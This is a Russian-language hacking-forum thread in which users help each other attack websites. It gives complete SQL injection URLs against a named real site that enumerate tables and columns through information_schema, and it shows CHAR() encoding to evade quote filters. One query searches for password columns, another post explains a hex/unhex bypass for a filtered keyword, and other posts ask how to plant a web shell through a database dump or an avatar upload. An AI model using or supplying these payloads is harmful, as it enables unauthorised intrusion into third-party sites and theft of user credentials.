Ваши вопросы по уязвимостям.

Т.е. имея возможность залить обратно Дамп БД , я не могу залить шел ?

 

мое мнение - только если есть file_priv, у пользователя mysql.
ну или в самой базе содержится Php код, и потом выполняется в eval ... (очень редко такое бывает)

 

http://www.vturs.ru/index.php?mod=view&id=999+union+select+1,table_name,3,4,5,6,7,8,9+from+information_schema.tables+limit+23,2/*
Колонка форума с юзерами. но что дальше делать это я забыл ;( подскажите

 

Вообще то тебе дальше нужно узнать как называются столбики в найденой таблице, для этого нужно вывести поле column_name из таблицы information_schema.columns при этом указать where table_name='phpbb_acl_users' но если там кавычки фильруются то нужно закодировать допустим чаром вот так table_name=CHAR(112,104,112,98,98,95,97,99,108,95,117,115,101,114,115)
Отсюда запрос будет таким
http://www.vturs.ru/index.php?mod=view&id=999+union+select+1,column_name,3,4,5,6,7,8,9+from+information_schema.columns+where+table_name=CHAR(112,104,112,98,98,95,97,99,108,95,117,115,101,114,115)/*
Потом лимитом перебираеш все столбики... НО... я глянул в это таблице вроде нету поле пароля...
Я обычно для ускорения делаю так
http://www.vturs.ru/index.php?mod=view&id=999+union+select+1,column_name,3,4,5,6,7,8,table_name+from+information_schema.columns+where+column_name+LIKE+CHAR(37,112,97,115,37)+limit+0,1/*
под чаром скрыто %pas% Это значит что я хочу вывести все столбики в которых есть сочетание 'pas' Можно конечно нарватся и на pwd тогда этот запрос не пройдет, но обычно значительно ускоряет процес.
Удачи!

 

А разве скл инж тул не работает в данном случае ?Особенно в пятой версии)

 

Велемир
о да.. еще как работает sql tool 3

пс: у кого есть норм енкодер text в char()?

 

http://www.webfuture.ru/igo/convert.php

 

спс)

 

ситуация такая:

Есть форум - вобла.
там можно юзать авики. Но там как и на ачате, не видно где лежит авик. а такой адрес, типа _http://forum.antichat.ru/image.php?u=34303&dateline=1206845324

мне нужно в авик вписать шелл.

вопрос:
как мне анйти путь к моему авику? Или в этом случае аваторы в БД?

 

В булке аватары в бд если не ошибаюсь)

 

Есть скуля. Версия 5. База данных и юзера выдернул.
Когда начинают вытаскивать наименования колонки, меня выкидывает на белую страницу ни без чего.
Есть предположение, что фильтрует "table_name" - как этот фильтр обойти?

 

Ershik, hex(unhex(table_name)) попробуй.

з.ы. Можно ещё с aes_encrypt поэксперементировать

 

Страница есть, но вывод информации пропал.
Самое грустное, что там оключен вывод ошибок.

 

Ershik
Может ссылку? Доступ к шеме есть?

 

Закинул ссылку в личку. Определил, что ругается на table_name. Ничего больше не фильтрует.

 

Посмотрел с лимитом пашет

 

Может всё-таки unhex(hex(value)) ? а то как-то нелогично..

 

jokester, спасибо.

+toxa+ запахало, но не видно вывода таблицы на "стандартном месте".

Извиняюсь, забыл убрать пробел. Все работает.

 

Я даже не увидел,но сдесь пофигу, там нормальная кодировка

 

+toxa+, оу, да)) ну опечатался..